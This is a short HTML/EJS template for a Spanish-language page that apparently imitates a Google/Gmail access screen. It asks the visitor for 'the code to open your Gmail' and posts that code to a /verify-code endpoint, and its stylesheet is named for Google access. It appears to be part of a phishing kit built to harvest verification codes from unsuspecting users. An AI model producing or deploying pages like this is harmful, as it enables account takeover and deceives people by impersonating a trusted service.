<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>
        <%= title %>
    </title>
    <link href="https://fonts.googleapis.com/css?family=Lato:300,400,700" rel="stylesheet">
    <link rel="stylesheet" href="css/styles-access-google.css">
</head>

<body>
    <form action="/verify-code" class="content-code" method="POST">
        <img class="img" id="img" src=./img/icon2.png>
        <label for="code">Ingrese el código para abrir su Gmail</label>
        <input type="text" id="code" autofocus name="code" required autocomplete="off">
        <input type="submit" value="Acceder">
    </form>
</body>

</html>